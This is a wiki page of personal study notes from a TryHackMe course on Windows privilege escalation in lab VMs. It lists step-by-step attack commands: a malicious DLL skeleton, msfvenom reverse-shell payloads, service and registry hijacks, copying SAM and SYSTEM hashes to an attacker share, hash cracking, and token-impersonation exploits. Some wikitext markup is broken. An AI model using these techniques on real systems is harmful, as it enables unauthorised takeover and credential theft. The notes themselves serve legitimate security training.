imported>Aghanim at 20:10, 2 January 2022

2022-01-02T20:10:33Z

New page

[[File:2022-01-windows-privilege-escalation-for-beginners_60e888f606201-1.jpeg|thumb|https://freesoft4download.com/windows-privilege-escalation-for-beginners/]]

This is my notes from the Junior Pentesting course at TryHackMe. This course takes you through the basics and some advanced topics regarding penetration testing.

----

= Introduction =

Privilege escalation will require you to follow a methodology similar to the one given below:

* Enumerate the current user's privileges and resources it can access.

* If the antivirus software allows it, run an automated enumeration script such as '''winPEAS '''or '''PowerUp.ps1'''

* If the initial enumeration and scripts do not uncover an obvious strategy, try a different approach (e.g. manually go over a checklist like the one provided [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md here])

= Information Gathering =

== Permissions ==

'''icacls - '''Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.

* '''F''' - Full access

* '''M'''- Modify access

* '''RX''' - Read and execute access

* '''R''' - Read-only access

* '''W''' - Write-only access

Example: <code>icacls Desktop</code>

== User enumeration ==

The following commands will help us enumerate users and their privileges on the target system.

* Current user’s privileges: <code>'''whoami /priv'''</code>

* List users: <code>'''net users'''</code>

* List details of a user: <code>'''net user username'''</code> (e.g. <code>'''net user Administrator'''</code>)

* Other users logged in simultaneously: <code>'''qwinsta '''</code>(the query session command can be used the same way)

* User groups defined on the system: '''<code>net localgroup</code>'''

* List members of a specific group: '''<code>net localgroup groupname</code>''' (e.g. <code>'''net localgroup Administrators'''</code>)

== Collection System Information ==

The systeminfo command will return an overview of the target system.

<syntaxhighlight lang="bash">
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
</syntaxhighlight>

== Searching files ==

The <code>'''findstr '''</code>command can be used to find such files in a format similar to the one given below:

<syntaxhighlight lang="bash">
findstr /si password *.txt
</syntaxhighlight>

==== Command breakdown: ====

<code>'''findstr'''</code>: Searches for patterns of text in files.

<code>'''/si'''</code>: Searches the current directory and all subdirectories (s), ignores upper case / lower case differences (i)

'''<code>password</code>''': The command will search for the string “password” in files

<code>'''*.txt'''</code>: The search will cover files that have a .txt extension

The string and file extension can be changed according to your needs and the target environment, but “.'''txt'''”, “.'''xml'''”, “.'''ini'''”, “*.'''config'''”, and “.'''xls'''” are usually a good place to start.

== Path Level ==

A missing critical patch on the target system can be an easily exploitable ticket to privilege escalation. The command below can be used to list updates installed on the target system.

<syntaxhighlight lang="bash">
wmic qfe get Caption,Description,HotFixID,InstalledOn
</syntaxhighlight>

'''WMIC '''is a command-line tool on Windows that provides an interface for Windows Management Instrumentation ('''WMI''').

== Network Connections ==

In some cases, we see that some services run locally on a system and can only be accessible locally. System Administrators that lack basic cyber security knowledge tend to be laxer when setting services that are only accessible over the system (e.g. only responding to requests sent to 127.0.0.1). As we have access to the target system, such services can provide a ticket to a higher privileged user.

The netstat command can be used to list all listening ports on the target system. The netstat -ano command will return an output similar to the one listed below:

<syntaxhighlight lang="bash">
Output of the Netstat Command
C:\Users\user\Desktop>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 68
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
[...]
</syntaxhighlight>

The command above can be broken down as follows

* '''-a''': Displays all active connections and listening ports on the target system.

* '''-n''': Prevents name resolution. IP Addresses and ports are displayed with numbers instead of attempting to resolves names using DNS.

* '''-o''': Displays the process ID using each listed connection.

Any port listed as “'''LISTENING'''” that was not discovered with the external port scan can present a potential local service. If you uncover such a service, you can try port forwarding to connect and potentially exploit it.

== Scheduled Tasks ==

The schtasks command can be used to query scheduled tasks.

<syntaxhighlight lang="bash">
schtasks /query /fo LIST /v
</syntaxhighlight>

== Drivers ==

The '''<code>driverquery</code> '''command will list drivers installed on the target system. You will need to do some online research about the drivers listed and see if any presents a potential privilege escalation vulnerability.

== Antivirus ==

The query below will search for a service named “windefend” and return its current state.

<syntaxhighlight lang="bash">
sc query windefend
</syntaxhighlight>

While the second approach will allow you to detect antivirus software without prior knowledge about its service name, the output may be overwhelming.

<syntaxhighlight lang="bash">
sc queryex type=service
</syntaxhighlight>

= Tools of the trade =

== WinPEAS ==

WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths. Good practice to always redirect the output to a file, as shown below:

<syntaxhighlight lang="bash">
winpeas.exe > outputfile.txt
</syntaxhighlight>

WinPEAS can be downloaded [https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS here]

== PowerUp ==

PowerUp is a PowerShell script that searches common privilege escalation on the target system. You can run it with the <code>'''Invoke-AllChecks'''</code> option that will perform all possible checks on the target system or use it to conduct specific checks (e.g. the '''<code>Get-UnquotedService</code> '''option to only look for potential unquoted service path vulnerabilities).

PowerUp can be downloaded [https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc here].

'''Reminder''': To run PowerUp on the target system, you may need to bypass the execution policy restrictions. To achieve this, you can launch PowerShell using the command below.

Running PowerUp.ps1 on the Target System

<syntaxhighlight lang="bash">
C:\Users\user\Desktop>powershell.exe -nop -exec bypass
</syntaxhighlight>

== Windows Exploit Suggester ==

To avoid making unnecessary noise that can attract attention, you may prefer to use Windows Exploit Suggester, which will run on your attacking machine.

Windows Exploit Suggester is a Python script that can be found and downloaded [https://github.com/AonCyberLabs/Windows-Exploit-Suggester here]

To use the script, you will need to run the <code>systeminfo</code> command on the target system. Do not forget to direct the output to a .txt file you will need to move to your attacking machine.

Once this is done, windows-exploit-suggester.py can be run as follows;

<syntaxhighlight lang="bash">
windows-exploit-suggester.py --database 2021-09-21-mssb.xls --systeminfo sysinfo_output.txt
</syntaxhighlight>

== Metasploit ==

If you already have a Meterpreter shell on the target system, you can use the <code>'''multi/recon/local_exploit_suggester'''</code> module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target system.

= Vulnerable Software =

The command below will dump information it can gather on installed software.
<code>'''wmic product'''</code>

You could filter the output to obtain a cleaner output with the command below.
<code>'''wmic product get name,version,vendor'''</code>

Be careful; due to some backward compatibility issues (e.g. software written for 32 bits systems running on 64 bits), the '''<code>wmic product</code> '''command may not return all installed programs.

It is worth checking running services using the command below to have a better understanding of the target system.

<syntaxhighlight lang="bash">
wmic service list brief
</syntaxhighlight>

grep the output for running services by adding a <code>findstr</code> command as shown below.

<syntaxhighlight lang="bash">
wmic service list brief | findstr "Running"
# Auto start service
wmic service get name,displayname,pathname,startmode | findstr /i "auto"

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
</syntaxhighlight>

If you need more information on any service, you can simply use the sc qc command as seen below.

sc qc for more information on a service

<syntaxhighlight lang="bash">
C:\Users\user>sc qc RemoteMouseService
</syntaxhighlight>

= DLL Hijacking =

'''DLL '''hijacking is an effective technique that can allow you to inject code into an application. Some Windows executables will use '''Dynamic Link Libraries''' (DLLs) when running. We think of DLLs as files that store additional functions that support the main function of the '''.exe''' file. In a way, DLLs are executable files, but they can not be run directly like an exe file. They should be launched by other applications (or exe in most cases). If we can switch the legitimate DLL file with a specially crafted DLL file, our code will be run by the application. DLL hijacking requires an application (typically an exe file) that either has a missing DLL file, or where the search order can be used to insert the malicious DLL file.

== Introduction to DLL Files ==

DLL Files are stored in '''C:\Winows\System32'''.

A DLL Hijacking scenario consists of replacing a '''legitimate '''DLL file with a '''malicious '''DLL file that will be called by the executable and run. By this point, you may have an idea about the specific conditions required for a successful DLL hijacking attack. These can be summarized as;

* An application that uses one or more DLL files.

* A way to manipulate these DLL files.

In summary, for standard desktop applications, Windows will follow one of the orders listed below depending on if the SafeDllSearchMode is enabled or not.

If '''SafeDllSearchMode''' is enabled, the search order is as follows:

* The directory from which the application loaded.

* The system directory. Use the '''[https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya GetSystemDirectory]''' function to get the path of this directory.

* The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.

* The Windows directory. Use the '''[https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya GetWindowsDirectory]''' function to get the path of this directory.

* The current directory.

* The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the '''App Paths''' registry key. The '''App Paths''' key is not used when computing the DLL search path.

If '''SafeDllSearchMode''' is disabled, the search order is as follows:

* The directory from which the application loaded.

* The current directory.

* The system directory. Use the '''[https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya GetSystemDirectory]''' function to get the path of this directory.

* The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.

* The Windows directory. Use the '''[https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya GetWindowsDirectory]''' function to get the path of this directory.

* The directories that are listed in the '''PATH '''environment variable. Note that this does not include the per-application path specified by the '''App Paths''' registry key. The '''App Paths''' key is not used when computing the '''DLL search path'''.

For example, if our '''application.exe '''requires the''' app.dll''' file to run, it will look for the''' app.dll''' file first in the directory from which it is launched. If this does not return any match for app.dll, the search will continue in the above-specified order. If the user privileges we have on the system allow us to write to any folder in the search order, we can have a possible DLL hijacking vulnerability. An important note is that the application should not be able to find the legitimate DLL before our modified DLL.

== Finding DLL Hijacking Vulnerabilities ==

Identifying DLL Hijacking vulnerabilities will require loading additional tools or scripts to the target system.

The tool you can use to find potential DLL hijacking vulnerabilities is '''Process Monitor '''(ProcMon). ProcMon requires '''admin '''rights, so it will not work on the target machine. You have to setup a test environment and conduct research there.

The screenshot below shows you what to look for in the '''ProcMon '''interface. You will see some entries resulted in “'''NAME NOT FOUND'''”.

[[File:2022-01-image-71.png|thumb]]

The last two lines in the screenshot above show that dllhijackservice.exe is trying to launch hijackme.dll in the “'''C:\Temp'''” folder but can not find this file. This is a typical case of a missing DLL file.

== Creating a malicious DLL file ==

The example below is a skeleton DLL file you can adapt according to your needs.

Skeleton Code for the Malicious DLL
#include

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
</pre>

You can see this file will execute the '''<code>whoami</code> '''command (<code>'''cmd.exe /k whoami'''</code>) and save the output in a file called "'''dll.txt'''".

The '''mingw '''compiler can be used to generate the DLL file with the command given below:

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

</pre>

You can install the '''mingw '''compiler using the <code>'''apt install gcc-mingw-w64-x86-64'''</code> command.

We have seen earlier that the application we target searches for a DLL named '''hijackme.dll'''. This is what our malicious DLL should be named.

Once compiled, we will need to move the '''hijackme.dll''' file to the Temp folder in our target system. You can use the following PowerShell command to download the''' .dll''' file to the target system:

wget -O hijackme.dll ATTACKBOX_IP:PORT/hijackme.dll

</pre>

[[File:2022-01-image-72.png|thumb]]

We will have to stop and start the dllsvc service again using the command below:

sc stop dllsvc & sc start dllsvc

</pre>

[[File:2022-01-image-73.png|thumb]]

= Unquoted Service Path =

When a service starts in Windows, the operating system has to find and run an executable file. For example, you will see in the terminal output below that the "'''netlogon'''" service (responsible for authenticating users in the domain) is, in fact, referring to the''' C:\Windows\system32\lsass.exe''' binary.

<syntaxhighlight lang="bash">
Netlogon and its binary
C:\Users\user>sc qc netlogon
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: netlogon
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\lsass.exe
LOAD_ORDER_GROUP : MS_WindowsRemoteValidation
TAG : 0
DISPLAY_NAME : Netlogon
DEPENDENCIES : LanmanWorkstation
SERVICE_START_NAME : LocalSystem

C:\Users\user>

</syntaxhighlight>

In the example above:

* '''Service '''in launched, windows follow a search order similar to above notes.

* Windows approach: if the path is written between '''quotes''', Windows will directly go to the correct location and launch '''service.exe'''

* If path is '''not '''written between quotes and if any folder name in the path has a space in its name things get complicated. Windows will append "'''.exe"''' and start looking for an executable, starting with the shortest possible path.

In our example, this would be''' C:\Program.exe'''. If '''program.exe''' is not available, the second attempt will be to run '''topservice.exe''' under '''C:\Program Files\'''. If this also fails, another attempt will be made for '''C:\Program Files\topservice folder\subservice.exe'''. This process repeats until the executable is found.

Knowing this, if we can place an executable in a location we know the service is looking for one, it may be run by the service.

== Finding Unquoted Service Path Vulnerabilities ==

Tools like '''winPEAS '''and '''PowerUp.ps1 '''will usually detect '''unquoted service paths'''. But we will need to make sure other requirements to exploit the vulnerability are filled. These are;

* Being able to write to a folder on the path

* Being able to restart the service

The command below will list services running on the target system. The result will also print out other information, such as the display name and path.

wmic service get name,displayname,pathname,startmode
</pre>

Going over the output of this command on the target machine, you will notice that the "unquotedsvc" service has a path that is not written between quotes.

You can further check the binary path of this service using the command below:

sc qc unquotedsvc

</pre>

We can use accesschk.exe with the command below to check for our privileges.

.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"

</pre>

We can use msfvenom (on the AttackBox) to generate an executable. The command below will wrap Meterpreter in an executable file.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[KALI or AttackBox IP Address] LPORT=[The Port to which the reverse shell will connect] -f exe > executable_name.exe

</pre>

Now either start a '''/multi/handler''' or a '''netcat '''listener on your attacking machine.
Once you have generated and moved the file to the correct location on the target machine, you will need to restart the vulnerable service.

You can use the <code>'''sc start unquotedsvc'''</code> command to start the service.

== Service exploits - Unquoted Service Path (2) ==

Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.

<syntaxhighlight lang="bash">
sc qc unquotedsvc
</syntaxhighlight>

Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
</syntaxhighlight>

Copy the reverse.exe executable you created to this directory and rename it Common.exe:

<syntaxhighlight lang="bash">
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
</syntaxhighlight>

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

<syntaxhighlight lang="bash">
net start unquotedsvc
</syntaxhighlight>

= Service exploits - Insecure Service permissions =

Use accesschk.exe to check the "user" account's permissions on the "daclsvc" service:

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
</syntaxhighlight>

Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).

Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):

<syntaxhighlight lang="bash">
sc qc daclsvc
</syntaxhighlight>

Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:

<syntaxhighlight lang="bash">
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
</syntaxhighlight>

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

<syntaxhighlight lang="bash">
net start daclsvc
</syntaxhighlight>

= Service Exploits - Insecure Service permissions 2 =

If there is a service with insecure service permission you can enable it and add your user to local administratos group. You can use PowerUp to check for insecure service permissions.

PowerUp also have a invoke-serviceabuse function.

<syntaxhighlight lang="bash">
sc config SNMPTRAP binpath= "cmd.exe /c net localgroup administrators USER /add" start= "demand" obj= "NT AUTHORITY\SYSTEM" password= ""

# Now start the service
sc start SNMPTRAP

# Verify that your user is in the local administrators group
net localgroup administrators
</syntaxhighlight>

= Service Exploits - Weak Regisry Permissions =

Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

<syntaxhighlight lang="bash">
sc qc regsvc
</syntaxhighlight>

Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
</syntaxhighlight>

Overwrite the ImagePath registry key to point to the reverse.exe executable you created:

<syntaxhighlight lang="bash">
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
</syntaxhighlight>

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

<syntaxhighlight lang="bash">
net start regsvc
</syntaxhighlight>

= Service Exploits - Insecure Service Executables =

Query the "filepermsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).

<syntaxhighlight lang="bash">
sc qc filepermsvc
</syntaxhighlight>

Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
</syntaxhighlight>

Copy the reverse.exe executable you created and replace the filepermservice.exe with it:

<syntaxhighlight lang="bash">
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
</syntaxhighlight>

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

<syntaxhighlight lang="bash">
net start filepermsvc
</syntaxhighlight>

= Registry - AutoRun =

Query the registry for AutoRun executables:

<syntaxhighlight lang="bash">
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
</syntaxhighlight>

Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
</syntaxhighlight>

Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:

<syntaxhighlight lang="bash">
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
</syntaxhighlight>

Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves!

<syntaxhighlight lang="bash">
rdesktop MACHINE_IP
</syntaxhighlight>

= Registry - AlwaysInstallElevated =

Query the registry for AlwaysInstallElevated keys:

<syntaxhighlight lang="bash">
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
</syntaxhighlight>

Note that both keys are set to 1 (0x1).

On Kali, generate a reverse shell Windows Installer (reverse.msi) using msfvenom. Update the LHOST IP address accordingly:

<syntaxhighlight lang="bash">
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
</syntaxhighlight>

Transfer the reverse.msi file to the C:\PrivEsc directory on Windows (use the SMB server method from earlier).

Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:

<syntaxhighlight lang="bash">
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
</syntaxhighlight>

= Passwords - Registry =

The registry can be searched for keys and values that contain the word "password":

<syntaxhighlight lang="bash">
reg query HKLM /f password /t REG_SZ /s
</syntaxhighlight>

If you want to save some time, query this specific key to find admin AutoLogon credentials:

<syntaxhighlight lang="bash">
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
</syntaxhighlight>

On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):

<syntaxhighlight lang="bash">
winexe -U 'admin%password' //MACHINE_IP cmd.exe
</syntaxhighlight>

= Passwords - Saved Creds =

List any saved credentials:

<syntaxhighlight lang="bash">
cmdkey /list
</syntaxhighlight>

Note that credentials for the "admin" user are saved. If they aren't, run the C:\PrivEsc\savecred.bat script to refresh the saved credentials.

Start a listener on Kali and run the reverse.exe executable using runas with the admin user's saved credentials:

<syntaxhighlight lang="bash">
runas /savecred /user:admin C:\PrivEsc\reverse.exe
</syntaxhighlight>

= Passwords - Security Account Manager (SAM) =

The SAM and SYSTEM files can be used to extract user password hashes. This VM has insecurely stored backups of the SAM and SYSTEM files in the C:\Windows\Repair\ directory.

Transfer the SAM and SYSTEM files to your Kali VM:

<syntaxhighlight lang="bash">
copy C:\Windows\Repair\SAM \\10.10.10.10\kali\copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\
</syntaxhighlight>

On Kali, clone the creddump7 repository (the one on Kali is outdated and will not dump hashes correctly for Windows 10!) and use it to dump out the hashes from the SAM and SYSTEM files:

<syntaxhighlight lang="bash">
git clone https://github.com/Tib3rius/creddump7pip3 install pycryptopython3 creddump7/pwdump.py SYSTEM SAM
</syntaxhighlight>

Crack the admin NTLM hash using hashcat:

<syntaxhighlight lang="bash">
hashcat -m 1000 --force /usr/share/wordlists/rockyou.txt
</syntaxhighlight>

You can use the cracked password to log in as the admin using winexe or RDP.

= Scheduled Tasks =

View the contents of the C:\DevTools\CleanUp.ps1 script:

<syntaxhighlight lang="bash">
type C:\DevTools\CleanUp.ps1
</syntaxhighlight>

The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file:

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
</syntaxhighlight>

Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created:

<syntaxhighlight lang="bash">
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
</syntaxhighlight>

Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.

= Insecure GUI Apps =

Start an RDP session as the "user" account:

<syntaxhighlight lang="bash">
rdesktop -u user -p password321 MACHINE_IP
</syntaxhighlight>

Double-click the "AdminPaint" shortcut on your Desktop. Once it is running, open a command prompt and note that Paint is running with admin privileges:

<syntaxhighlight lang="bash">
tasklist /V | findstr mspaint.exe
</syntaxhighlight>

In Paint, click "File" and then "Open". In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe

Press Enter to spawn a command prompt running with admin privileges.

= Startup Apps =

Using accesschk.exe, note that the BUILTIN\Users group can write files to the StartUp directory:

<syntaxhighlight lang="bash">
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
</syntaxhighlight>

Using cscript, run the C:\PrivEsc\CreateShortcut.vbs script which should create a new shortcut to your reverse.exe executable in the StartUp directory:

<syntaxhighlight lang="bash">
cscript C:\PrivEsc\CreateShortcut.vbs
</syntaxhighlight>

Start a listener on Kali, and then simulate an admin logon using RDP and the credentials you previously extracted:

<syntaxhighlight lang="bash">
rdesktop -u admin MACHINE_IP
</syntaxhighlight>

A shell running as admin should connect back to your listener.

= Token Impersonation - Rogue Potato =

Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:

<syntaxhighlight lang="bash">
sudo socat tcp-listen:135,reuseaddr,fork tcp:MACHINE_IP:9999
</syntaxhighlight>

Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account:

<syntaxhighlight lang="bash">
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
</syntaxhighlight>

Start another listener on Kali.

Now, in the "local service" reverse shell you triggered, run the RoguePotato exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly):

<syntaxhighlight lang="bash">
C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999
</syntaxhighlight>

= Token Impersonation - PrintSpoofer =

Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account:

<syntaxhighlight lang="bash">
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
</syntaxhighlight>

Start another listener on Kali.

Now, in the "local service" reverse shell you triggered, run the PrintSpoofer exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly):

<syntaxhighlight lang="bash">
C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
</syntaxhighlight>

= Token Impersonation =

Service accounts may have a higher privilege level than the low-level user you may have. In Windows versions before Server 2019 and 10 (version 1809), these service accounts are affected by an internal man-in-the-middle vulnerability. As you may know,''' man-in-the-middle '''(MitM) attacks are conducted by intercepting network traffic. In a similar fashion, higher privileged service accounts will be forced to authenticate to a local port we listen on. Once the service account attempts to authenticate, this request is modified to negotiate a security token for the "'''NT AUTHORITY\SYSTEM'''" account. The security token obtained can be used by the user we have in a process called "'''impersonation'''". Although it has led to several exploits, the impersonation rights were not a vulnerability.

[[Category:Learning Path]]
[[Category:TryHackMe]]

Learning Path/Windows Privilege Escalation - Revision history

imported>Aghanim at 20:10, 2 January 2022